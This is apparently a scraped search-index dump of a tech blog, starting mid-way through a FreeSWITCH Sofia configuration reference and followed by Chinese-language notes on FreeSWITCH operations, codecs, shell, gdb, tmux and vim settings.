Valid options:\nfalse true first-only CallerID Related options caller-id type choose one, can be overridden by inbound call type and/or the sip_cid_type channel variable Remote-Party-ID header: P-*-Identity family of headers: neither one: pass-callee-id (defaults to true) Disable by setting it to false if you encounter a gateway that for some reason hates X-headers that it is supposed to ignore\nOther (TO DO) hold-music disable-hold This allows you to disable Music On Hold (added in GIT commit e5cc0539ffcbf660637198c698e90c2e30b05c2f, from Fri Apr 30 19:14:39 2010 -0500). This can be useful when the calling device intends to send its own MOH, but nevertheless sends a REINVITE to FreeSWITCH triggering its MOH. This can also be done from the dialplan with the rtp_disable_hold channel variable.\napply-inbound-acl set which access control lists, defined in acl.conf.xml, apply to this profile\napply-register-acl apply-proxy-acl This allows traffic to be sent to FreeSWITCH via one or more proxy servers. The proxy server should add a header named X-AUTH-IP containing the IP address of the client. FreeSWITCH trusts the proxy because its IP is listed in the proxy server ACL, and uses the value of the IP in this header as the client\u0026rsquo;s IP for ACL authentication (acl defined in apply-inbound-acl).\nrecord-template max-proceeding max number of open dialogs in proceeding\nbind-params if you want to send any special bind params of your own\ndisable-transfer disables call transfer, which may be undesirable in a public switch\nmanual-redirect enable-3pcc enable-3pcc determines if third party call control is allowed or not. Third party call control is useful in cases where the SIP INVITE doesn\u0026rsquo;t include an SDP (late media negotiation). 
enable-3pcc can be set to either \u0026lsquo;true\u0026rsquo; or \u0026lsquo;proxy\u0026rsquo;; true accepts the call right away, proxy waits until the call has been answered before accepting it\nnonce-ttl TTL for the nonce in SIP auth\nThis parameter is set to 60 seconds if not set here. It\u0026rsquo;s used to determine how long to store the user registration record in the sip_authentication table. The expires field in the sip_authentication table is this value plus the expires set by the user agent.\nsql-in-transactions If set to true (default), it will instruct the profile to wait for 500 SQL statements to accumulate or 500ms to elapse and execute them in a transaction (to boost performance).\nodbc-dsn If you have ODBC support and a working dsn you can use it instead of SQLite\nmwi-use-reg-callid username If you wish to hide the fact that you are using FreeSWITCH in the SDP message (specifically the o= and s= fields), then set the username param under the profile. This has no relation whatsoever to the username parameter when we\u0026rsquo;re dealing with gateways. If this value is left unset, the system defaults to using FreeSWITCH as the username in the o= and s= fields.\nExample:\nv=0\no=root 1346068950 1346068951 IN IP4 1.2.3.4\ns=root\nc=IN IP4 1.2.3.4\nt=0 0\nm=audio 26934 RTP/AVP 18 0 101 13\na=fmtp:18 annexb=no\na=rtpmap:101 telephone-event/8000\na=fmtp:101 0-16\na=ptime:20\nwhen you set Directory of Users To allow users to register with the server, the user information must be specified in the conf/directory/default/*xml file. 
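As a sketch, a minimal user entry in one of those directory files could look like the following (the domain name, user id, and password here are placeholders):

```xml
<include>
  <domain name="example.com">
    <user id="1000">
      <params>
        <!-- Password the endpoint uses when answering the auth challenge -->
        <param name="password" value="1234"/>
      </params>
    </user>
  </domain>
</include>
```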
To dynamically specify what users can register, use Mod xml curl\nDefault Configuration File From the FreeSWITCH Github repository\u0026rsquo;s vanilla configurations ([conf/vanilla/autoload_configs/sofia.conf.xml](https://github.com/signalwire/freeswitch/blob/master/conf/vanilla/autoload_configs/sofia.conf.xml)): conf/autoload_configs/sofia.conf.xml \u0026lt;global_settings\u0026gt; \u0026lt;!-- the new format for HEPv2/v3 and capture ID protocol:host:port;hep=2;capture_id=200;\n--\u0026gt; \u0026lt;/global_settings\u0026gt;\nshutdown and restart FreeSWITCH (or) unload and load mod_sofia If you\u0026rsquo;ve only made changes to a particular profile, you may simply (WARNING: will drop all calls associated with this profile):\nsofia profile restart reloadxml Security Features SIP TLS for secure signaling. SRTP for secure media delivery. The Auth section above for authentication settings. 参考 https://freeswitch.org/confluence/display/FREESWITCH/Sofia+Configuration+Files ","permalink":"https://wdd.js.org/freeswitch/sofia-config/","summary":"About Sofia is a FreeSWITCH™ module (mod_sofia) that provides SIP connectivity to and from FreeSWITCH in the form of a User Agent. A \u0026ldquo;User Agent\u0026rdquo; (\u0026ldquo;UA\u0026rdquo;) is an application used for handling a certain network protocol; the network protocol in Sofia\u0026rsquo;s case is SIP. Sofia is the general name of any User Agent in FreeSWITCH using the SIP network protocol. 
For example, Sofia receives calls sent to FreeSWITCH from other SIP User Agents (UAs), sends calls to other UAs, acts as a client to register FreeSWITCH with other UAs, lets clients register with FreeSWITCH, and connects calls (i.","title":"Sofia 模块全部配置"},{"content":"安装单个模块 make mod_sofia-install make mod_ilbc-install fs-cli事件订阅 /event plain ALL /event plain CHANNEL_ANSWER sofia 帮助文档 sofia help USAGE: -------------------------------------------------------------------------------- sofia global siptrace \u0026lt;on|off\u0026gt; sofia capture \u0026lt;on|off\u0026gt; watchdog \u0026lt;on|off\u0026gt; sofia profile \u0026lt;name\u0026gt; [start | stop | restart | rescan] [wait] flush_inbound_reg [\u0026lt;call_id\u0026gt; | \u0026lt;[user]@domain\u0026gt;] [reboot] check_sync [\u0026lt;call_id\u0026gt; | \u0026lt;[user]@domain\u0026gt;] [register | unregister] [\u0026lt;gateway name\u0026gt; | all] killgw \u0026lt;gateway name\u0026gt; [stun-auto-disable | stun-enabled] [true | false]] siptrace \u0026lt;on|off\u0026gt; capture \u0026lt;on|off\u0026gt; watchdog \u0026lt;on|off\u0026gt; sofia \u0026lt;status|xmlstatus\u0026gt; profile \u0026lt;name\u0026gt; [reg [\u0026lt;contact str\u0026gt;]] | [pres \u0026lt;pres str\u0026gt;] | [user \u0026lt;user@domain\u0026gt;] sofia \u0026lt;status|xmlstatus\u0026gt; gateway \u0026lt;name\u0026gt; sofia loglevel \u0026lt;all|default|tport|iptsec|nea|nta|nth_client|nth_server|nua|soa|sresolv|stun\u0026gt; [0-9] sofia tracelevel \u0026lt;console|alert|crit|err|warning|notice|info|debug\u0026gt; sofia help -------------------------------------------------------------------------------- 开启消息头压缩 \u0026lt;param name=\u0026#34;enable-compact-headers\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt; fs需要重启\n呼叫相关指令 # 显示当前呼叫 show calls # 显示呼叫数量 show calls count # 挂断某个呼叫 uuid_kill 58579bd2-db78-4c7e-a666-0f16e19be643 # 挂断所有呼叫 hupall # sip抓包 sofia profile internal siptrace on sofia profile external siptrace on # 拨打某个用户并启用echo回音 originate 
user/1000 \u0026amp;echo 正则测试 在fs_cli里面可以用regex快速测试正则是否符合预期结果\nregex 123123 | \\d regex 123123 | ^\\d* 变量求值 eval $${mod_dir} eval $${recording_dir} 修改UA信息 sofia_external.conf.xml sofia_internal.conf.xml \u0026lt;param name=\u0026#34;user-agent-string\u0026#34; value=\u0026#34;wdd\u0026#34;/\u0026gt; \u0026lt;param name=\u0026#34;username\u0026#34; value=\u0026#34;wdd\u0026#34;/\u0026gt; 修改之后需要rescan profile.\nmod_distributor的两个常用指令 # reload distributor_ctl reload # 求值 eval ${distributor(distributor_list)} 自动接听回音测试 \u0026lt;extension name=\u0026#34;wdd_echo\u0026#34;\u0026gt; \u0026lt;condition field=\u0026#34;destination_number\u0026#34; expression=\u0026#34;^8002\u0026#34;\u0026gt; \u0026lt;action application=\u0026#34;info\u0026#34; data=\u0026#34;\u0026#34;\u0026gt;\u0026lt;/action\u0026gt; \u0026lt;action application=\u0026#34;answer\u0026#34; data=\u0026#34;\u0026#34;\u0026gt;\u0026lt;/action\u0026gt; \u0026lt;action application=\u0026#34;echo\u0026#34; data=\u0026#34;\u0026#34;\u0026gt;\u0026lt;/action\u0026gt; \u0026lt;/condition\u0026gt; \u0026lt;/extension\u0026gt; odbc-dsn配置错误,fs进入假死状态 最近遇到一个奇怪的问题,相同的fs镜像,在一个环境正常运行,但是在进入另一个环境的时候,fs进程运行起来了,但是所有的功能都异常,仿佛进入了假死状态。并且控制台的日志输出也没有什么有用的信息。\n后来,我想起来以前曾经遇到过这个问题。\n这个fs的镜像中没有编译odbc相关的依赖,但是看sofia_external.conf.xml和sofia_internal.conf.xml, 却有odbc相关的配置。\n\u0026lt;param name=\u0026#34;odbc-dsn\u0026#34; value=\u0026#34;....\u0026#34;\u0026gt; 所以只要把这个odbc-dsn的配置注释掉,fs就正常运行了。\n取消session-timer 某些情况下fs会对呼入的电话,在通话时长达到1分钟的时候,向对端发送一个re-invite, 实际上这还是一个invite请求,只是to字段有了tag参数。这个机制叫做session-timer, 具体定义在RFC4028中。\n但是某些SIP终端可能不支持re-invite, 然后不对这个re-invite做回应,或者回应了一个错误的状态码,都会导致这通呼叫异常挂断。\n在internal.xml中修改如下行:\n\u0026lt;param name=\u0026#34;enable-timer\u0026#34; value=\u0026#34;false\u0026#34;/\u0026gt; RTP失活超时检测 某个时刻开始,客户端无法再向FS发送流媒体了。例如客户端Web页面关闭,或者浏览器关闭。\n但是在这种场景下,FS还是会向客户端发送一段时间的媒体流,然后再发送BYE消息。那么,我们如何控制这个RTP失活的检测时间呢?\n在internal.xml或者external.xml中,有以下参数,可以控制检测RTP超时时间。\nrtp-timeout-sec rtp超时秒数 rtp-hold-timeout-sec rtphold超时秒数 
\u0026lt;param name=\u0026#34;rtp-timeout-sec\u0026#34; value=\u0026#34;10\u0026#34;/\u0026gt; \u0026lt;param name=\u0026#34;rtp-hold-timeout-sec\u0026#34; value=\u0026#34;10\u0026#34;/\u0026gt; sofia profile internal restart\nfs 配置多租户分机 分机的相关配置都是位于conf/directory目录中, 我的directory目录中只有一个default.xml文件\n\u0026lt;include\u0026gt; \u0026lt;domain name=\u0026#34;123.cc\u0026#34;\u0026gt; \u0026lt;user id=\u0026#34;1000\u0026#34;\u0026gt; \u0026lt;params\u0026gt; \u0026lt;param name=\u0026#34;password\u0026#34; value=\u0026#34;1234\u0026#34;/\u0026gt; \u0026lt;/params\u0026gt; \u0026lt;/user\u0026gt; \u0026lt;user id=\u0026#34;1001\u0026#34;\u0026gt; \u0026lt;params\u0026gt; \u0026lt;param name=\u0026#34;password\u0026#34; value=\u0026#34;1234\u0026#34;/\u0026gt; \u0026lt;/params\u0026gt; \u0026lt;/user\u0026gt; \u0026lt;/domain\u0026gt; \u0026lt;domain name=\u0026#34;abc.cc\u0026#34;\u0026gt; \u0026lt;user id=\u0026#34;1000\u0026#34;\u0026gt; \u0026lt;params\u0026gt; \u0026lt;param name=\u0026#34;password\u0026#34; value=\u0026#34;1234\u0026#34;/\u0026gt; \u0026lt;/params\u0026gt; \u0026lt;/user\u0026gt; \u0026lt;user id=\u0026#34;1001\u0026#34;\u0026gt; \u0026lt;params\u0026gt; \u0026lt;param name=\u0026#34;password\u0026#34; value=\u0026#34;1234\u0026#34;/\u0026gt; \u0026lt;/params\u0026gt; \u0026lt;/user\u0026gt; \u0026lt;/domain\u0026gt; \u0026lt;/include\u0026gt; fs状态转移图 ","permalink":"https://wdd.js.org/freeswitch/tips/","summary":"安装单个模块 make mod_sofia-install make mod_ilbc-install fs-cli事件订阅 /event plain ALL /event plain CHANNEL_ANSWER sofia 帮助文档 sofia help USAGE: -------------------------------------------------------------------------------- sofia global siptrace \u0026lt;on|off\u0026gt; sofia capture \u0026lt;on|off\u0026gt; watchdog \u0026lt;on|off\u0026gt; sofia profile \u0026lt;name\u0026gt; [start | stop | restart | rescan] [wait] flush_inbound_reg [\u0026lt;call_id\u0026gt; | \u0026lt;[user]@domain\u0026gt;] [reboot] check_sync [\u0026lt;call_id\u0026gt; | 
\u0026lt;[user]@domain\u0026gt;] [register | unregister] [\u0026lt;gateway name\u0026gt; | all] killgw \u0026lt;gateway name\u0026gt; [stun-auto-disable | stun-enabled] [true | false]] siptrace \u0026lt;on|off\u0026gt; capture \u0026lt;on|off\u0026gt; watchdog \u0026lt;on|off\u0026gt; sofia \u0026lt;status|xmlstatus\u0026gt; profile \u0026lt;name\u0026gt; [reg [\u0026lt;contact str\u0026gt;]] | [pres \u0026lt;pres str\u0026gt;] | [user \u0026lt;user@domain\u0026gt;] sofia \u0026lt;status|xmlstatus\u0026gt; gateway \u0026lt;name\u0026gt; sofia loglevel \u0026lt;all|default|tport|iptsec|nea|nta|nth_client|nth_server|nua|soa|sresolv|stun\u0026gt; [0-9] sofia tracelevel \u0026lt;console|alert|crit|err|warning|notice|info|debug\u0026gt; sofia help -------------------------------------------------------------------------------- 开启消息头压缩 \u0026lt;param name=\u0026#34;enable-compact-headers\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt; fs需要重启","title":"FS常用运维手册"},{"content":"查看FS支持的编码 show codec 编码设置 vars.xml\nglobal_codec_prefs=G722,PCMU,PCMA,GSM outbound_codec_prefs=PCMU,PCMA,GSM 查看FS使用的编码 \u0026gt; sofia status profile internal CODECS IN ILBC,PCMU,PCMA,GSM CODECS OUT ILBC,PCMU,PCMA,GSM \u0026gt; sofia status profile external CODECS IN ILBC,PCMU,PCMA,GSM CODECS OUT ILBC,PCMU,PCMA,GSM 使修改后的profile生效 \u0026gt; sofia profile internal rescan \u0026gt; sofia profile external rescan 重启profile \u0026gt; sofia profile internal restart \u0026gt; sofia profile external restart ","permalink":"https://wdd.js.org/freeswitch/media-settings/","summary":"查看FS支持的编码 show codec 编码设置 vars.xml\nglobal_codec_prefs=G722,PCMU,PCMA,GSM outbound_codec_prefs=PCMU,PCMA,GSM 查看FS使用的编码 \u0026gt; sofia status profile internal CODECS IN ILBC,PCMU,PCMA,GSM CODECS OUT ILBC,PCMU,PCMA,GSM \u0026gt; sofia status profile external CODECS IN ILBC,PCMU,PCMA,GSM CODECS OUT ILBC,PCMU,PCMA,GSM 使修改后的profile生效 \u0026gt; sofia profile internal rescan \u0026gt; sofia profile external rescan 重启profile \u0026gt; 
sofia profile internal restart \u0026gt; sofia profile external restart ","permalink":"https://wdd.js.org/freeswitch/media-settings/","summary":"查看FS支持的编码 show codec 编码设置 vars.xml\nglobal_codec_prefs=G722,PCMU,PCMA,GSM outbound_codec_prefs=PCMU,PCMA,GSM 查看FS使用的编码 \u0026gt; sofia status profile internal CODECS IN ILBC,PCMU,PCMA,GSM CODECS OUT ILBC,PCMU,PCMA,GSM \u0026gt; sofia status profile external CODECS IN ILBC,PCMU,PCMA,GSM CODECS OUT ILBC,PCMU,PCMA,GSM 使修改后的profile生效 \u0026gt; sofia profile internal rescan \u0026gt; sofia profile external rescan 重启profile \u0026gt; ","title":"FreeSWITCH 媒体相关操作"},{"content":"复制文本到剪贴板 sudo apt install xclip vim ~/.zshrc\nalias copy=\u0026#39;xclip -selection clipboard\u0026#39; 这样我们就可以用copy命令来拷贝文件内容到系统剪贴板了。\ncopy aaa.txt 判断工作区是否clean if [ -z \u0026#34;$(git status --porcelain)\u0026#34; ]; then # Working directory clean else # Uncommitted changes fi ","permalink":"https://wdd.js.org/posts/2022/05/shell-101/","summary":"复制文本到剪贴板 sudo apt install xclip vim ~/.zshrc\nalias copy=\u0026#39;xclip -selection clipboard\u0026#39; 这样我们就可以用copy命令来拷贝文件内容到系统剪贴板了。\ncopy aaa.txt 判断工作区是否clean if [ -z \u0026#34;$(git status --porcelain)\u0026#34; ]; then # Working directory clean else # Uncommitted changes fi ","title":"Shell 教程技巧"},{"content":"开启coredump #如果该命令的返回值是0,则表示不开启coredump ulimit -c # 开启coredump ulimit -c unlimited 准备c文件 #include\u0026lt;stdio.h\u0026gt; void crash() { char * p = NULL; *p = 0; } int main(){ printf(\u0026#34;hello world 1\u0026#34;); int phone [4]; phone[232] = 12; crash(); return 0; } 编译执行 gcc -g hello.c -o hello ./hello 之后程序崩溃,产生core文件。\ngdb分析 gdb 启动的二进制文件 core文件\ngdb ./hello ./core 之后输入: bt full 可以查看到更详细的信息\n➜ c-sandbox gdb ./hello ./core GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git Copyright (C) 2016 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later \u0026lt;http://gnu.org/licenses/gpl.html\u0026gt; This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type \u0026#34;show copying\u0026#34; and \u0026#34;show warranty\u0026#34; for details. This GDB was configured as \u0026#34;arm-linux-gnueabihf\u0026#34;. Type \u0026#34;show configuration\u0026#34; for configuration details. For bug reporting instructions, please see: \u0026lt;http://www.gnu.org/software/gdb/bugs/\u0026gt;. Find the GDB manual and other documentation resources online at: \u0026lt;http://www.gnu.org/software/gdb/documentation/\u0026gt;. 
For help, type \u0026#34;help\u0026#34;. Type \u0026#34;apropos word\u0026#34; to search for commands related to \u0026#34;word\u0026#34;... Reading symbols from ./hello...done. [New LWP 25571] Core was generated by `./hello\u0026#39;. Program terminated with signal SIGSEGV, Segmentation fault. #0 0x0001045c in crash () at hello.c:6 6 *p = 0; (gdb) bt full #0 0x0001045c in crash () at hello.c:6 p = 0x0 #1 0x00010490 in main () at hello.c:13 phone = {66328, 0, 0, 0} ","permalink":"https://wdd.js.org/posts/2022/05/c-and-gdb/","summary":"开启coredump #如果该命令的返回值是0,则表示不开启coredump ulimit -c # 开启coredump ulimit -c unlimited 准备c文件 #include\u0026lt;stdio.h\u0026gt; void crash() { char * p = NULL; *p = 0; } int main(){ printf(\u0026#34;hello world 1\u0026#34;); int phone [4]; phone[232] = 12; crash(); return 0; } 编译执行 gcc -g hello.c -o hello ./hello 之后程序崩溃,产生core文件。\ngdb分析 gdb 启动的二进制文件 core文件\ngdb ./hello ./core 之后输入: bt full 可以查看到更详细的信息\n➜ c-sandbox gdb ./hello ./core GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git Copyright (C) 2016 Free Software Foundation, Inc.","title":"C和gdb调试"},{"content":"oh my tmux 关闭第二键ctrl-a ctrl-a可以用来移动光标到行首的,不要作为tmux的第二键\nset -gu prefix2 unbind C-a Tmux reload config :source-file ~/.tmux.conf tmux 显示时间 ctrl b + t tmux从当前目录打开新的窗口 bind \u0026#39;\u0026#34;\u0026#39; split-window -c \u0026#34;#{pane_current_path}\u0026#34; bind % split-window -h -c \u0026#34;#{pane_current_path}\u0026#34; bind c new-window -c \u0026#34;#{pane_current_path}\u0026#34; ","permalink":"https://wdd.js.org/posts/2022/05/tmux-faq/","summary":"oh my tmux 关闭第二键ctrl-a ctrl-a可以用来移动光标到行首的,不要作为tmux的第二键\nset -gu prefix2 unbind C-a Tmux reload config :source-file ~/.tmux.conf tmux 显示时间 ctrl b + t tmux从当前目录打开新的窗口 bind \u0026#39;\u0026#34;\u0026#39; split-window -c \u0026#34;#{pane_current_path}\u0026#34; bind % split-window -h -c \u0026#34;#{pane_current_path}\u0026#34; bind c new-window -c \u0026#34;#{pane_current_path}\u0026#34; ","title":"Tmux 常见问题以及解决方案"},{"content":"修改coc-vim的错误提示 
coc-vim的错误提示窗口背景色是粉红,前景色是深红。这样的颜色搭配,很难看到具体的文字颜色。\n所以我们需要把前景色改成白色。\n:highlight CocErrorFloat ctermfg=White 参考 https://stackoverflow.com/questions/64180454/how-to-change-coc-nvim-floating-window-colors\nvim go一直卡在初始化 有可能没有安装二进制工具\n:GoInstallBinaries neovim 光标变成细线解决方案 :set guicursor= ","permalink":"https://wdd.js.org/vim/vim-faq/","summary":"修改coc-vim的错误提示 coc-vim的错误提示窗口背景色是粉红,前景色是深红。这样的颜色搭配,很难看到具体的文字颜色。\n所以我们需要把前景色改成白色。\n:highlight CocErrorFloat ctermfg=White 参考 https://stackoverflow.com/questions/64180454/how-to-change-coc-nvim-floating-window-colors\nvim go一直卡在初始化 有可能没有安装二进制工具\n:GoInstallBinaries neovim 光标变成细线解决方案 :set guicursor= ","title":"Vim 常见问题以及解决方案"},{"content":"我承认,vscode很香,但是vim的开发方式也让我无法割舍。\nvscode中有个vim插件,基本上可以满足大部分vim的功能。\n这里我定义了我在vim常用的leader快捷键。\n设置,为默认的leader \u0026#34;vim.leader\u0026#34;: \u0026#34;,\u0026#34;, 在Normal模式能command+c复制 \u0026#34;vim.handleKeys\u0026#34;: { \u0026#34;\u0026lt;C-c\u0026gt;\u0026#34;: false, \u0026#34;\u0026lt;C-v\u0026gt;\u0026#34;: false }, leader快捷键 在插入模式按jj会跳出插入模式 ,a: 跳到行尾部,并进入插入模式 ,c: 关闭当前标签页 ,C: 关闭其他标签页 ,j: 跳转到左边标签页 ,k: 跳转到右边标签页 ,w: 保存文件 ,t: 给出提示框 ,b: 显示或者隐藏文件树窗口 完整的配置 \u0026#34;vim.leader\u0026#34;: \u0026#34;,\u0026#34;, \u0026#34;vim.insertModeKeyBindings\u0026#34;: [ { \u0026#34;before\u0026#34;: [ \u0026#34;j\u0026#34;, \u0026#34;j\u0026#34; ], \u0026#34;after\u0026#34;: [ \u0026#34;\u0026lt;Esc\u0026gt;\u0026#34; ] } ], \u0026#34;vim.handleKeys\u0026#34;: { \u0026#34;\u0026lt;C-c\u0026gt;\u0026#34;: false, \u0026#34;\u0026lt;C-v\u0026gt;\u0026#34;: false }, \u0026#34;vim.normalModeKeyBindingsNonRecursive\u0026#34;: [ { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;a\u0026#34; ], \u0026#34;after\u0026#34;: [ \u0026#34;A\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;c\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;workbench.action.closeActiveEditor\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ 
\u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;C\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;workbench.action.closeOtherEditors\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;j\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;workbench.action.previousEditor\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;k\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;workbench.action.nextEditor\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;w\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;workbench.action.files.save\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;t\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;editor.action.showHover\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;b\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;workbench.action.toggleSidebarVisibility\u0026#34; ] }, ] ","permalink":"https://wdd.js.org/vim/vscode-vim/","summary":"我承认,vscode很香,但是vim的开发方式也让我无法割舍。\nvscode中有个vim插件,基本上可以满足大部分vim的功能。\n这里我定义了我在vim常用的leader快捷键。\n设置,为默认的leader \u0026#34;vim.leader\u0026#34;: \u0026#34;,\u0026#34;, 在Normal模式能command+c复制 \u0026#34;vim.handleKeys\u0026#34;: { \u0026#34;\u0026lt;C-c\u0026gt;\u0026#34;: false, 
\u0026#34;\u0026lt;C-v\u0026gt;\u0026#34;: false }, \u0026#34;vim.normalModeKeyBindingsNonRecursive\u0026#34;: [ { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;a\u0026#34; ], \u0026#34;after\u0026#34;: [ \u0026#34;A\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;c\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;workbench.","title":"vscode vim插件自定义快捷键"},{"content":"neovim如何与系统剪贴板交互? neovim和系统剪贴板的交互方式和vim的机制是不同的,所以不要先入为主的用vim的方式使用neovim。\nneovim需要外部的程序与系统剪贴板进行交互,参考:help clipboard\nneovim按照如下的优先级方式选择交互程序:\n- |g:clipboard| - pbcopy, pbpaste (macOS) - wl-copy, wl-paste (if $WAYLAND_DISPLAY is set) - xclip (if $DISPLAY is set) - xsel (if $DISPLAY is set) - lemonade (for SSH) https://github.com/pocke/lemonade - doitclient (for SSH) http://www.chiark.greenend.org.uk/~sgtatham/doit/ - win32yank (Windows) - termux (via termux-clipboard-set, termux-clipboard-get) - tmux (if $TMUX is set) 因为我的操作系统是linux, 所以方便的方式是直接安装xclip。\nsudo pacman -Syu xclip 两个系统剪贴板有何不同? 对于windows和mac来说,只有一个系统剪贴板,对于linux有两个。\n剪贴板,鼠标选择剪贴板 剪贴板,选择之后复制剪贴板 如下图,我用鼠标选择了12345, 但是没有按ctrl + c, 这时候你打开nvim, 执行:reg, 可以看到注册器\n\u0026#34;* 12345 如果按了ctrl + c\n\u0026#34;* 12345 \u0026#34;+ 12345 所以,在vim中如果想粘贴系统剪贴板中的内容,可以使用 C-R * 或者 C-R +\n如何把vim buffer中的全部内容复制到系统剪贴板? :%y+ ","permalink":"https://wdd.js.org/vim/clipboard/","summary":"neovim如何与系统剪贴板交互? neovim和系统剪贴板的交互方式和vim的机制是不同的,所以不要先入为主的用vim的方式使用neovim。\nneovim需要外部的程序与系统剪贴板进行交互,参考:help clipboard\nneovim按照如下的优先级方式选择交互程序:\n- |g:clipboard| - pbcopy, pbpaste (macOS) - wl-copy, wl-paste (if $WAYLAND_DISPLAY is set) - xclip (if $DISPLAY is set) - xsel (if $DISPLAY is set) - lemonade (for SSH) https://github.com/pocke/lemonade - doitclient (for SSH) http://www.chiark.greenend.org.uk/~sgtatham/doit/ - win32yank (Windows) - termux (via termux-clipboard-set, termux-clipboard-get) - tmux (if $TMUX is set) 因为我的操作系统是linux, 所以方便的方式是直接安装xclip。\nsudo pacman -Syu xclip 两个系统剪贴板有何不同? 
对于windows和mac来说,只有一个系统剪贴板,对于linux有两个。\n剪贴板,鼠标选择剪贴板 剪贴板,选择之后复制剪贴板 如下图,我用鼠标选择了12345, 但是没有按ctrl + c, 这时候你打开nvim, 执行:reg, 可以看到注册器","title":"和系统剪贴板进行交互"},{"content":"在vscode中,可以选中一个目录,然后在目录中搜索对应的关键词,再查找到对应文件中,然后做替换。\n在vim也可以这样做。\n但是这件事要分成两步。\n根据关键词,查找文件 对多个文件进行替换 搜索关键词 搜索关键词可以用grep, 或者vim自带的vimgrep。\n但是我更喜欢用ripgrep,因为速度很快。\nripgrep也有对应的vim插件 https://github.com/jremmen/vim-ripgrep\n例如要搜索关键词 key1, 那么符合关键词的文件将会被放到quickfix列表中。\n:Rg key1 可以用 :copen 来打开quickfix列表。\n替换 cdo :cdo %s/key1/key2/gc c表示在替换的时候,需要手工确认每一项。\n在替换的时候,可以输入\ny (yes)执行替换 n (no)忽略此处替换 a (all)替换此处和之后的所有项目 q (quit) 退出替换过程 l (last) 替换此处后退出 ^E 向上滚动屏幕 ^Y 向下滚动屏幕 ","permalink":"https://wdd.js.org/vim/search-dir-replace/","summary":"在vscode中,可以选中一个目录,然后在目录中搜索对应的关键词,再查找到对应文件中,然后做替换。\n在vim也可以这样做。\n但是这件事要分成两步。\n根据关键词,查找文件 对多个文件进行替换 搜索关键词 搜索关键词可以用grep, 或者vim自带的vimgrep。\n但是我更喜欢用ripgrep,因为速度很快。\nripgrep也有对应的vim插件 https://github.com/jremmen/vim-ripgrep\n例如要搜索关键词 key1, 那么符合关键词的文件将会被放到quickfix列表中。\n:Rg key1 可以用 :copen 来打开quickfix列表。\n替换 cdo :cdo %s/key1/key2/gc c表示在替换的时候,需要手工确认每一项。\n在替换的时候,可以输入\ny (yes)执行替换 n (no)忽略此处替换 a (all)替换此处和之后的所有项目 q (quit) 退出替换过程 l (last) 替换此处后退出 ^E 向上滚动屏幕 ^Y 向下滚动屏幕 ","title":"搜索工作目录下的文件并替换"},{"content":" Info C表示按住Ctrl, C-o表示同时按住Ctrl和o 1. 在tmux中 vim-airline插件颜色显示不正常 解决方案:\nexport TERM=screen-256color 2. buffer相关操作 :ls # 显示所有打开的buffer :b {bufferName} #支持tab键自动补全 :bd # 关闭当前buffer :bn # 切换到下一个buffer :bp # 切换到上一个buffer :b# # 切换到上一个访问过的buffer :b1 # 切换到buffer1 :bm # 切换到最近修改过的buffer :sb {bufferName} # 上下分屏 :vert sb {bufferName} # 左右分屏 3. 跳转到对应的符号上 下面这种符号,一般都是成双成对的,只要在其中一个上按%, 就会自动跳转到对应的符号\n() [] {} 4. 关闭netrw的banner 如果熟练地使用了netrw,就可以把默认开启的banner给关闭掉。\nlet g:netrw_banner = 0 let g:netrw_liststyle = 3 let g:netrw_winsize = 25 5. 如何同时保存所有发生变化的文件? 把所有发生变化的文件给保存 :wa 把所有发生变化的文件都保存,然后退出vim :xa 退出vim, 所有发生变化的文件都不保存,:qa! 6. 插入当前时间 :r!date 7. 光标下的文件跳转 按gf可以跳转光标下的文件\nimport {say} from \u0026#39;./api\u0026#39; 也有可能跳的不准确,或者找不到,因为vim不知道文件后缀\n:set suffixesadd+=.js 8. 
